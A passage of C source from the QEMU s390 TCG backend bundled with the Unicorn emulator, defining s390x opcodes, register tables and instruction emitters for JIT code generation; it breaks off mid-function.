atomic_set((int32_t *)jmp_addr, disp / 2); /* no need to flush icache explicitly */ } #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif

unicorn-2.1.1/qemu/tcg/s390/tcg-target.inc.c

/* * Tiny Code Generator for QEMU * * Copyright (c) 2009 Ulrich Hecht <uli@suse.de> * Copyright (c) 2009 Alexander Graf <agraf@suse.de> * Copyright (c) 2010 Richard Henderson <rth@twiddle.net> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* We only support generating code for 64-bit mode. */ #if TCG_TARGET_REG_BITS != 64 #error "unsupported code generation mode" #endif #include "../tcg-pool.inc.c" #include "elf.h" /* ??? The translation blocks produced by TCG are generally small enough to be entirely reachable with a 16-bit displacement. Leaving the option for a 32-bit displacement here Just In Case. */ #define USE_LONG_BRANCHES 0 #define TCG_CT_CONST_S16 0x100 #define TCG_CT_CONST_S32 0x200 #define TCG_CT_CONST_S33 0x400 #define TCG_CT_CONST_ZERO 0x800 /* Several places within the instruction set 0 means "no register" rather than TCG_REG_R0. */ #define TCG_REG_NONE 0 /* A scratch register that may be used throughout the backend. */ #define TCG_TMP0 TCG_REG_R1 /* A scratch register that holds a pointer to the beginning of the TB. We don't need this when we have pc-relative loads with the general instructions extension facility. */ #define TCG_REG_TB TCG_REG_R12 #define USE_REG_TB (!(s390_facilities & FACILITY_GEN_INST_EXT)) #ifndef CONFIG_SOFTMMU #define TCG_GUEST_BASE_REG TCG_REG_R13 #endif /* All of the following instructions are prefixed with their instruction format, and are defined as 8- or 16-bit quantities, even when the two halves of the 16-bit quantity may appear 32 bits apart in the insn. This makes it easy to copy the values from the tables in Appendix B.
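   For example, RIE_RISBG below is 0xec55: the emitter writes
   (op & 0xff00) into the leading halfword and (op & 0xff) into the
   trailing one, even though four bytes of operands sit in between.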
*/ typedef enum S390Opcode { RIL_AFI = 0xc209, RIL_AGFI = 0xc208, RIL_ALFI = 0xc20b, RIL_ALGFI = 0xc20a, RIL_BRASL = 0xc005, RIL_BRCL = 0xc004, RIL_CFI = 0xc20d, RIL_CGFI = 0xc20c, RIL_CLFI = 0xc20f, RIL_CLGFI = 0xc20e, RIL_CLRL = 0xc60f, RIL_CLGRL = 0xc60a, RIL_CRL = 0xc60d, RIL_CGRL = 0xc608, RIL_IIHF = 0xc008, RIL_IILF = 0xc009, RIL_LARL = 0xc000, RIL_LGFI = 0xc001, RIL_LGRL = 0xc408, RIL_LLIHF = 0xc00e, RIL_LLILF = 0xc00f, RIL_LRL = 0xc40d, RIL_MSFI = 0xc201, RIL_MSGFI = 0xc200, RIL_NIHF = 0xc00a, RIL_NILF = 0xc00b, RIL_OIHF = 0xc00c, RIL_OILF = 0xc00d, RIL_SLFI = 0xc205, RIL_SLGFI = 0xc204, RIL_XIHF = 0xc006, RIL_XILF = 0xc007, RI_AGHI = 0xa70b, RI_AHI = 0xa70a, RI_BRC = 0xa704, RI_CHI = 0xa70e, RI_CGHI = 0xa70f, RI_IIHH = 0xa500, RI_IIHL = 0xa501, RI_IILH = 0xa502, RI_IILL = 0xa503, RI_LGHI = 0xa709, RI_LLIHH = 0xa50c, RI_LLIHL = 0xa50d, RI_LLILH = 0xa50e, RI_LLILL = 0xa50f, RI_MGHI = 0xa70d, RI_MHI = 0xa70c, RI_NIHH = 0xa504, RI_NIHL = 0xa505, RI_NILH = 0xa506, RI_NILL = 0xa507, RI_OIHH = 0xa508, RI_OIHL = 0xa509, RI_OILH = 0xa50a, RI_OILL = 0xa50b, RIE_CGIJ = 0xec7c, RIE_CGRJ = 0xec64, RIE_CIJ = 0xec7e, RIE_CLGRJ = 0xec65, RIE_CLIJ = 0xec7f, RIE_CLGIJ = 0xec7d, RIE_CLRJ = 0xec77, RIE_CRJ = 0xec76, RIE_LOCGHI = 0xec46, RIE_RISBG = 0xec55, RRE_AGR = 0xb908, RRE_ALGR = 0xb90a, RRE_ALCR = 0xb998, RRE_ALCGR = 0xb988, RRE_CGR = 0xb920, RRE_CLGR = 0xb921, RRE_DLGR = 0xb987, RRE_DLR = 0xb997, RRE_DSGFR = 0xb91d, RRE_DSGR = 0xb90d, RRE_FLOGR = 0xb983, RRE_LGBR = 0xb906, RRE_LCGR = 0xb903, RRE_LGFR = 0xb914, RRE_LGHR = 0xb907, RRE_LGR = 0xb904, RRE_LLGCR = 0xb984, RRE_LLGFR = 0xb916, RRE_LLGHR = 0xb985, RRE_LRVR = 0xb91f, RRE_LRVGR = 0xb90f, RRE_LTGR = 0xb902, RRE_MLGR = 0xb986, RRE_MSGR = 0xb90c, RRE_MSR = 0xb252, RRE_NGR = 0xb980, RRE_OGR = 0xb981, RRE_SGR = 0xb909, RRE_SLGR = 0xb90b, RRE_SLBR = 0xb999, RRE_SLBGR = 0xb989, RRE_XGR = 0xb982, RRF_LOCR = 0xb9f2, RRF_LOCGR = 0xb9e2, RRF_NRK = 0xb9f4, RRF_NGRK = 0xb9e4, RRF_ORK = 0xb9f6, RRF_OGRK = 0xb9e6, RRF_SRK = 0xb9f9, RRF_SGRK = 0xb9e9, RRF_SLRK = 0xb9fb, RRF_SLGRK = 0xb9eb, RRF_XRK = 0xb9f7, RRF_XGRK = 0xb9e7, RR_AR = 0x1a, RR_ALR = 0x1e, RR_BASR = 0x0d, RR_BCR = 0x07, RR_CLR = 0x15, RR_CR = 0x19, RR_DR = 0x1d, RR_LCR = 0x13, RR_LR = 0x18, RR_LTR = 0x12, RR_NR = 0x14, RR_OR = 0x16, RR_SR = 0x1b, RR_SLR = 0x1f, RR_XR = 0x17, RSY_RLL = 0xeb1d, RSY_RLLG = 0xeb1c, RSY_SLLG = 0xeb0d, RSY_SLLK = 0xebdf, RSY_SRAG = 0xeb0a, RSY_SRAK = 0xebdc, RSY_SRLG = 0xeb0c, RSY_SRLK = 0xebde, RS_SLL = 0x89, RS_SRA = 0x8a, RS_SRL = 0x88, RXY_AG = 0xe308, RXY_AY = 0xe35a, RXY_CG = 0xe320, RXY_CLG = 0xe321, RXY_CLY = 0xe355, RXY_CY = 0xe359, RXY_LAY = 0xe371, RXY_LB = 0xe376, RXY_LG = 0xe304, RXY_LGB = 0xe377, RXY_LGF = 0xe314, RXY_LGH = 0xe315, RXY_LHY = 0xe378, RXY_LLGC = 0xe390, RXY_LLGF = 0xe316, RXY_LLGH = 0xe391, RXY_LMG = 0xeb04, RXY_LRV = 0xe31e, RXY_LRVG = 0xe30f, RXY_LRVH = 0xe31f, RXY_LY = 0xe358, RXY_NG = 0xe380, RXY_OG = 0xe381, RXY_STCY = 0xe372, RXY_STG = 0xe324, RXY_STHY = 0xe370, RXY_STMG = 0xeb24, RXY_STRV = 0xe33e, RXY_STRVG = 0xe32f, RXY_STRVH = 0xe33f, RXY_STY = 0xe350, RXY_XG = 0xe382, RX_A = 0x5a, RX_C = 0x59, RX_L = 0x58, RX_LA = 0x41, RX_LH = 0x48, RX_ST = 0x50, RX_STC = 0x42, RX_STH = 0x40, NOP = 0x0707, } S390Opcode; #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "%r0", "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%r15" }; #endif /* Since R6 is a potential argument register, choose it last of the call-saved registers.
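   (In the s390x ELF ABI, R2-R6 carry the integer arguments, so R6 is
   both call-saved and the fifth argument register.)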
Likewise prefer the call-clobbered registers in reverse order to maximize the chance of avoiding the arguments. */ static const int tcg_target_reg_alloc_order[] = { /* Call saved registers. */ TCG_REG_R13, TCG_REG_R12, TCG_REG_R11, TCG_REG_R10, TCG_REG_R9, TCG_REG_R8, TCG_REG_R7, TCG_REG_R6, /* Call clobbered registers. */ TCG_REG_R14, TCG_REG_R0, TCG_REG_R1, /* Argument registers, in reverse order of allocation. */ TCG_REG_R5, TCG_REG_R4, TCG_REG_R3, TCG_REG_R2, }; static const int tcg_target_call_iarg_regs[] = { TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_R2, }; #define S390_CC_EQ 8 #define S390_CC_LT 4 #define S390_CC_GT 2 #define S390_CC_OV 1 #define S390_CC_NE (S390_CC_LT | S390_CC_GT) #define S390_CC_LE (S390_CC_LT | S390_CC_EQ) #define S390_CC_GE (S390_CC_GT | S390_CC_EQ) #define S390_CC_NEVER 0 #define S390_CC_ALWAYS 15 /* Condition codes that result from a COMPARE and COMPARE LOGICAL. */ static const uint8_t tcg_cond_to_s390_cond[] = { [TCG_COND_EQ] = S390_CC_EQ, [TCG_COND_NE] = S390_CC_NE, [TCG_COND_LT] = S390_CC_LT, [TCG_COND_LE] = S390_CC_LE, [TCG_COND_GT] = S390_CC_GT, [TCG_COND_GE] = S390_CC_GE, [TCG_COND_LTU] = S390_CC_LT, [TCG_COND_LEU] = S390_CC_LE, [TCG_COND_GTU] = S390_CC_GT, [TCG_COND_GEU] = S390_CC_GE, }; /* Condition codes that result from a LOAD AND TEST. Here, we have no unsigned instruction variation, however since the test is vs zero we can re-map the outcomes appropriately. */ static const uint8_t tcg_cond_to_ltr_cond[] = { [TCG_COND_EQ] = S390_CC_EQ, [TCG_COND_NE] = S390_CC_NE, [TCG_COND_LT] = S390_CC_LT, [TCG_COND_LE] = S390_CC_LE, [TCG_COND_GT] = S390_CC_GT, [TCG_COND_GE] = S390_CC_GE, [TCG_COND_LTU] = S390_CC_NEVER, [TCG_COND_LEU] = S390_CC_EQ, [TCG_COND_GTU] = S390_CC_NE, [TCG_COND_GEU] = S390_CC_ALWAYS, }; #ifdef CONFIG_SOFTMMU static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LESL] = helper_le_ldsl_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BESL] = helper_be_ldsl_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; #endif static tcg_insn_unit *tb_ret_addr; uint64_t s390_facilities; static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { intptr_t pcrel2; uint32_t old; value += addend; pcrel2 = (tcg_insn_unit *)value - code_ptr; switch (type) { case R_390_PC16DBL: if (pcrel2 == (int16_t)pcrel2) { tcg_patch16(code_ptr, pcrel2); return true; } break; case R_390_PC32DBL: if (pcrel2 == (int32_t)pcrel2) { tcg_patch32(code_ptr, pcrel2); return true; } break; case R_390_20: if (value == sextract64(value, 0, 20)) { old = *(uint32_t *)code_ptr & 0xf00000ff; old |= ((value & 0xfff) << 16) | ((value & 0xff000) >> 4); tcg_patch32(code_ptr, old); return true; } break; default: g_assert_not_reached(); } return false; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': /* all registers */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; break; case 'L': /* 
qemu_ld/st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_R2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); break; case 'a': /* force R2 for division */ ct->ct |= TCG_CT_REG; ct->u.regs = 0; tcg_regset_set_reg(ct->u.regs, TCG_REG_R2); break; case 'b': /* force R3 for division */ ct->ct |= TCG_CT_REG; ct->u.regs = 0; tcg_regset_set_reg(ct->u.regs, TCG_REG_R3); break; case 'A': ct->ct |= TCG_CT_CONST_S33; break; case 'I': ct->ct |= TCG_CT_CONST_S16; break; case 'J': ct->ct |= TCG_CT_CONST_S32; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* Test if a constant matches the constraint. */ static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if (type == TCG_TYPE_I32) { val = (int32_t)val; } /* The following are mutually exclusive. */ if (ct & TCG_CT_CONST_S16) { return val == (int16_t)val; } else if (ct & TCG_CT_CONST_S32) { return val == (int32_t)val; } else if (ct & TCG_CT_CONST_S33) { return val >= -0xffffffffll && val <= 0xffffffffll; } else if (ct & TCG_CT_CONST_ZERO) { return val == 0; } return 0; } /* Emit instructions according to the given instruction format. */ static void tcg_out_insn_RR(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2) { tcg_out16(s, (op << 8) | (r1 << 4) | r2); } static void tcg_out_insn_RRE(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2) { tcg_out32(s, (op << 16) | (r1 << 4) | r2); } static void tcg_out_insn_RRF(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2, int m3) { tcg_out32(s, (op << 16) | (m3 << 12) | (r1 << 4) | r2); } static void tcg_out_insn_RI(TCGContext *s, S390Opcode op, TCGReg r1, int i2) { tcg_out32(s, (op << 16) | (r1 << 20) | (i2 & 0xffff)); } static void tcg_out_insn_RIE(TCGContext *s, S390Opcode op, TCGReg r1, int i2, int m3) { tcg_out16(s, (op & 0xff00) | (r1 << 4) | m3); tcg_out32(s, (i2 << 16) | (op & 0xff)); } static void tcg_out_insn_RIL(TCGContext *s, S390Opcode op, TCGReg r1, int i2) { tcg_out16(s, op | (r1 << 4)); tcg_out32(s, i2); } static void tcg_out_insn_RS(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg b2, TCGReg r3, int disp) { tcg_out32(s, (op << 24) | (r1 << 20) | (r3 << 16) | (b2 << 12) | (disp & 0xfff)); } static void tcg_out_insn_RSY(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg b2, TCGReg r3, int disp) { tcg_out16(s, (op & 0xff00) | (r1 << 4) | r3); tcg_out32(s, (op & 0xff) | (b2 << 28) | ((disp & 0xfff) << 16) | ((disp & 0xff000) >> 4)); } #define tcg_out_insn_RX tcg_out_insn_RS #define tcg_out_insn_RXY tcg_out_insn_RSY /* Emit an opcode with "type-checking" of the format. */ #define tcg_out_insn(S, FMT, OP, ...) 
\ glue(tcg_out_insn_,FMT)(S, glue(glue(FMT,_),OP), ## __VA_ARGS__) /* emit 64-bit shifts */ static void tcg_out_sh64(TCGContext* s, S390Opcode op, TCGReg dest, TCGReg src, TCGReg sh_reg, int sh_imm) { tcg_out_insn_RSY(s, op, dest, sh_reg, src, sh_imm); } /* emit 32-bit shifts */ static void tcg_out_sh32(TCGContext* s, S390Opcode op, TCGReg dest, TCGReg sh_reg, int sh_imm) { tcg_out_insn_RS(s, op, dest, sh_reg, 0, sh_imm); } static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg dst, TCGReg src) { if (src != dst) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, LR, dst, src); } else { tcg_out_insn(s, RRE, LGR, dst, src); } } return true; } static const S390Opcode lli_insns[4] = { RI_LLILL, RI_LLILH, RI_LLIHL, RI_LLIHH }; static bool maybe_out_small_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long sval) { tcg_target_ulong uval = sval; int i; if (type == TCG_TYPE_I32) { uval = (uint32_t)sval; sval = (int32_t)sval; } /* Try all 32-bit insns that can load it in one go. */ if (sval >= -0x8000 && sval < 0x8000) { tcg_out_insn(s, RI, LGHI, ret, sval); return true; } for (i = 0; i < 4; i++) { tcg_target_long mask = 0xffffull << i*16; if ((uval & mask) == uval) { tcg_out_insn_RI(s, lli_insns[i], ret, uval >> i*16); return true; } } return false; } /* load a register with an immediate value */ static void tcg_out_movi_int(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long sval, bool in_prologue) { tcg_target_ulong uval; /* Try all 32-bit insns that can load it in one go. */ if (maybe_out_small_movi(s, type, ret, sval)) { return; } uval = sval; if (type == TCG_TYPE_I32) { uval = (uint32_t)sval; sval = (int32_t)sval; } /* Try all 48-bit insns that can load it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { if (sval == (int32_t)sval) { tcg_out_insn(s, RIL, LGFI, ret, sval); return; } if (uval <= 0xffffffff) { tcg_out_insn(s, RIL, LLILF, ret, uval); return; } if ((uval & 0xffffffff) == 0) { tcg_out_insn(s, RIL, LLIHF, ret, uval >> 32); return; } } /* Try for PC-relative address load. For odd addresses, attempt to use an offset from the start of the TB. */ if ((sval & 1) == 0) { ptrdiff_t off = tcg_pcrel_diff(s, (void *)sval) >> 1; if (off == (int32_t)off) { tcg_out_insn(s, RIL, LARL, ret, off); return; } } else if (USE_REG_TB && !in_prologue) { ptrdiff_t off = sval - (uintptr_t)s->code_gen_ptr; if (off == sextract64(off, 0, 20)) { /* This is certain to be an address within TB, and therefore OFF will be negative; don't try RX_LA. */ tcg_out_insn(s, RXY, LAY, ret, TCG_REG_TB, TCG_REG_NONE, off); return; } } /* A 32-bit unsigned value can be loaded in 2 insns. And given that LLILL, LLIHL, LLILF above did not succeed, we know that both insns are required. */ if (uval <= 0xffffffff) { tcg_out_insn(s, RI, LLILL, ret, uval); tcg_out_insn(s, RI, IILH, ret, uval >> 16); return; } /* Otherwise, stuff it in the constant pool. */ if (s390_facilities & FACILITY_GEN_INST_EXT) { tcg_out_insn(s, RIL, LGRL, ret, 0); new_pool_label(s, sval, R_390_PC32DBL, s->code_ptr - 2, 2); } else if (USE_REG_TB && !in_prologue) { tcg_out_insn(s, RXY, LG, ret, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, sval, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } else { TCGReg base = ret ? 
ret : TCG_TMP0; tcg_out_insn(s, RIL, LARL, base, 0); new_pool_label(s, sval, R_390_PC32DBL, s->code_ptr - 2, 2); tcg_out_insn(s, RXY, LG, ret, base, TCG_REG_NONE, 0); } } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long sval) { tcg_out_movi_int(s, type, ret, sval, false); } /* Emit a load/store type instruction. Inputs are: DATA: The register to be loaded or stored. BASE+OFS: The effective address. OPC_RX: If the operation has an RX format opcode (e.g. STC), otherwise 0. OPC_RXY: The RXY format opcode for the operation (e.g. STCY). */ static void tcg_out_mem(TCGContext *s, S390Opcode opc_rx, S390Opcode opc_rxy, TCGReg data, TCGReg base, TCGReg index, tcg_target_long ofs) { if (ofs < -0x80000 || ofs >= 0x80000) { /* Combine the low 20 bits of the offset with the actual load insn; the high 44 bits must come from an immediate load. */ tcg_target_long low = ((ofs & 0xfffff) ^ 0x80000) - 0x80000; tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - low); ofs = low; /* If we were already given an index register, add it in. */ if (index != TCG_REG_NONE) { tcg_out_insn(s, RRE, AGR, TCG_TMP0, index); } index = TCG_TMP0; } if (opc_rx && ofs >= 0 && ofs < 0x1000) { tcg_out_insn_RX(s, opc_rx, data, base, index, ofs); } else { tcg_out_insn_RXY(s, opc_rxy, data, base, index, ofs); } } /* load data without address translation or endianness conversion */ static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg data, TCGReg base, intptr_t ofs) { if (type == TCG_TYPE_I32) { tcg_out_mem(s, RX_L, RXY_LY, data, base, TCG_REG_NONE, ofs); } else { tcg_out_mem(s, 0, RXY_LG, data, base, TCG_REG_NONE, ofs); } } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg data, TCGReg base, intptr_t ofs) { if (type == TCG_TYPE_I32) { tcg_out_mem(s, RX_ST, RXY_STY, data, base, TCG_REG_NONE, ofs); } else { tcg_out_mem(s, 0, RXY_STG, data, base, TCG_REG_NONE, ofs); } } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { return false; } /* load data from an absolute host address */ static void tcg_out_ld_abs(TCGContext *s, TCGType type, TCGReg dest, void *abs) { intptr_t addr = (intptr_t)abs; if ((s390_facilities & FACILITY_GEN_INST_EXT) && !(addr & 1)) { ptrdiff_t disp = tcg_pcrel_diff(s, abs) >> 1; if (disp == (int32_t)disp) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RIL, LRL, dest, disp); } else { tcg_out_insn(s, RIL, LGRL, dest, disp); } return; } } if (USE_REG_TB) { ptrdiff_t disp = abs - (void *)s->code_gen_ptr; if (disp == sextract64(disp, 0, 20)) { tcg_out_ld(s, type, dest, TCG_REG_TB, disp); return; } } tcg_out_movi(s, TCG_TYPE_PTR, dest, addr & ~0xffff); tcg_out_ld(s, type, dest, dest, addr & 0xffff); } static inline void tcg_out_risbg(TCGContext *s, TCGReg dest, TCGReg src, int msb, int lsb, int ofs, int z) { /* Format RIE-f */ tcg_out16(s, (RIE_RISBG & 0xff00) | (dest << 4) | src); tcg_out16(s, (msb << 8) | (z << 7) | lsb); tcg_out16(s, (ofs << 8) | (RIE_RISBG & 0xff)); } static void tgen_ext8s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LGBR, dest, src); return; } if (type == TCG_TYPE_I32) { if (dest == src) { tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 24); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 24); } tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 24); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 56); tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 56); } } static void tgen_ext8u(TCGContext *s, TCGType 
type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LLGCR, dest, src); return; } if (dest == src) { tcg_out_movi(s, type, TCG_TMP0, 0xff); src = TCG_TMP0; } else { tcg_out_movi(s, type, dest, 0xff); } if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, NR, dest, src); } else { tcg_out_insn(s, RRE, NGR, dest, src); } } static void tgen_ext16s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LGHR, dest, src); return; } if (type == TCG_TYPE_I32) { if (dest == src) { tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 16); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 16); } tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 16); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 48); tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 48); } } static void tgen_ext16u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LLGHR, dest, src); return; } if (dest == src) { tcg_out_movi(s, type, TCG_TMP0, 0xffff); src = TCG_TMP0; } else { tcg_out_movi(s, type, dest, 0xffff); } if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, NR, dest, src); } else { tcg_out_insn(s, RRE, NGR, dest, src); } } static inline void tgen_ext32s(TCGContext *s, TCGReg dest, TCGReg src) { tcg_out_insn(s, RRE, LGFR, dest, src); } static inline void tgen_ext32u(TCGContext *s, TCGReg dest, TCGReg src) { tcg_out_insn(s, RRE, LLGFR, dest, src); } /* Accept bit patterns like these: 0....01....1 1....10....0 1..10..01..1 0..01..10..0 Copied from gcc sources. */ static inline bool risbg_mask(uint64_t c) { uint64_t lsb; /* We don't change the number of transitions by inverting, so make sure we start with the LSB zero. */ if (c & 1) { c = ~c; } /* Reject all zeros or all ones. */ if (c == 0) { return false; } /* Find the first transition. */ lsb = c & -c; /* Invert to look for a second transition. */ c = ~c; /* Erase the first transition. */ c &= -lsb; /* Find the second transition, if any. */ lsb = c & -c; /* Match if all the bits are 1's, or if c is zero. */ return c == -lsb; } static void tgen_andi_risbg(TCGContext *s, TCGReg out, TCGReg in, uint64_t val) { int msb, lsb; if ((val & 0x8000000000000001ull) == 0x8000000000000001ull) { /* Achieve wraparound by swapping msb and lsb. */ msb = 64 - ctz64(~val); lsb = clz64(~val) - 1; } else { msb = clz64(val); lsb = 63 - ctz64(val); } tcg_out_risbg(s, out, in, msb, lsb, 0, 1); } static void tgen_andi(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) { static const S390Opcode ni_insns[4] = { RI_NILL, RI_NILH, RI_NIHL, RI_NIHH }; static const S390Opcode nif_insns[2] = { RIL_NILF, RIL_NIHF }; uint64_t valid = (type == TCG_TYPE_I32 ? 0xffffffffull : -1ull); int i; /* Look for the zero-extensions. */ if ((val & valid) == 0xffffffff) { tgen_ext32u(s, dest, dest); return; } if (s390_facilities & FACILITY_EXT_IMM) { if ((val & valid) == 0xff) { tgen_ext8u(s, TCG_TYPE_I64, dest, dest); return; } if ((val & valid) == 0xffff) { tgen_ext16u(s, TCG_TYPE_I64, dest, dest); return; } } /* Try all 32-bit insns that can perform it in one go. */ for (i = 0; i < 4; i++) { tcg_target_ulong mask = ~(0xffffull << i*16); if (((val | ~valid) & mask) == mask) { tcg_out_insn_RI(s, ni_insns[i], dest, val >> i*16); return; } } /* Try all 48-bit insns that can perform it in one go. 
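   NILF and NIHF each AND one 32-bit half with an immediate, so they
   apply whenever the other half of the mask is all ones; e.g. for an
   illustrative val of 0xffffffff00001234ull this emits a single
   NILF dest, 0x00001234.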
*/ if (s390_facilities & FACILITY_EXT_IMM) { for (i = 0; i < 2; i++) { tcg_target_ulong mask = ~(0xffffffffull << i*32); if (((val | ~valid) & mask) == mask) { tcg_out_insn_RIL(s, nif_insns[i], dest, val >> i*32); return; } } } if ((s390_facilities & FACILITY_GEN_INST_EXT) && risbg_mask(val)) { tgen_andi_risbg(s, dest, dest, val); return; } /* Use the constant pool if USE_REG_TB, but not for small constants. */ if (USE_REG_TB) { if (!maybe_out_small_movi(s, type, TCG_TMP0, val)) { tcg_out_insn(s, RXY, NG, dest, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, val & valid, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); return; } } else { tcg_out_movi(s, type, TCG_TMP0, val); } if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, NR, dest, TCG_TMP0); } else { tcg_out_insn(s, RRE, NGR, dest, TCG_TMP0); } } static void tgen_ori(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) { static const S390Opcode oi_insns[4] = { RI_OILL, RI_OILH, RI_OIHL, RI_OIHH }; static const S390Opcode oif_insns[2] = { RIL_OILF, RIL_OIHF }; int i; /* Look for no-op. */ if (unlikely(val == 0)) { return; } /* Try all 32-bit insns that can perform it in one go. */ for (i = 0; i < 4; i++) { tcg_target_ulong mask = (0xffffull << i*16); if ((val & mask) != 0 && (val & ~mask) == 0) { tcg_out_insn_RI(s, oi_insns[i], dest, val >> i*16); return; } } /* Try all 48-bit insns that can perform it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { for (i = 0; i < 2; i++) { tcg_target_ulong mask = (0xffffffffull << i*32); if ((val & mask) != 0 && (val & ~mask) == 0) { tcg_out_insn_RIL(s, oif_insns[i], dest, val >> i*32); return; } } } /* Use the constant pool if USE_REG_TB, but not for small constants. */ if (maybe_out_small_movi(s, type, TCG_TMP0, val)) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, OR, dest, TCG_TMP0); } else { tcg_out_insn(s, RRE, OGR, dest, TCG_TMP0); } } else if (USE_REG_TB) { tcg_out_insn(s, RXY, OG, dest, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, val, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } else { /* Perform the OR via sequential modifications to the high and low parts. Do this via recursion to handle 16-bit vs 32-bit masks in each half. */ tcg_debug_assert(s390_facilities & FACILITY_EXT_IMM); tgen_ori(s, type, dest, val & 0x00000000ffffffffull); tgen_ori(s, type, dest, val & 0xffffffff00000000ull); } } static void tgen_xori(TCGContext *s, TCGType type, TCGReg dest, uint64_t val) { /* Try all 48-bit insns that can perform it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { if ((val & 0xffffffff00000000ull) == 0) { 